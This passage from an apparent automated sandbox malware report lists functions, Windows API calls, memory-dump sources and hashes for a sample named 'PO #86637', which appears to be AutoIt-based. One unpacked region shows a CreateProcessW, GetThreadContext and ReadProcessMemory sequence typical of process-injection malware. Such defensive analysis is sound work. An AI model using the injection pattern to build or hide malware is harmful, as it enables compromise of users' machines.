                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                      Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                      Download Yara Rule
                      Strings
                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _strcat
                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                      • API String ID: 1765576173-2684727018
                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                      Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                      Download Yara Rule
                      APIs
                      • __wsplitpath.LIBCMT ref: 004678F7
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLast__wsplitpath_malloc
                      • String ID:
                      • API String ID: 4163294574-0
                      • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                      • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                      Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                      • _strcat.LIBCMT ref: 0040F786
                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                      • String ID:
                      • API String ID: 3199840319-0
                      • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                      • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                      Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FreeInfoLibraryParametersSystem
                      • String ID:
                      • API String ID: 3403648963-0
                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                      Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                      Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      • __lock_file.LIBCMT ref: 00414A8D
                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                      • __fclose_nolock.LIBCMT ref: 00414A98
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                      Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • __lock_file.LIBCMT ref: 00415012
                      • __ftell_nolock.LIBCMT ref: 0041501F
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2999321469-0
                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                      Function 040D02F5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 040D0AB3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D0B49
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D0B6B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                      • Instruction ID: 6e0fd323aef42ba5a126c803cde729b53897e17b81a7e9ae2251e219c9b944da
                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                      • Instruction Fuzzy Hash: 9712EE20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F85CF5A
                      Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                      • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                      • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                      • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                      Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                      Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                      • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                      • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                      • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                      Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                      • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                      • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                      • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                      Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __lock_file
                      • String ID:
                      • API String ID: 3031932315-0
                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                      Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                      Download Yara Rule
                      APIs
                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                      • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                      • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                      • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                      Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                      Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                      • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                      • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                      • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                      Function 040D12F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 040D1309
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: 72d29520d1d26b480ef735d59f88ec419d766a54379406432e033b5bc80cf343
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 8AE0E67494020DDFDB00EFB4D5496DD7BF4EF04301F100561FD01E2280DA309D508A62

                      Non-executed Functions

                      Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                      • GetKeyState.USER32(00000011), ref: 0047C92D
                      • GetKeyState.USER32(00000009), ref: 0047C936
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
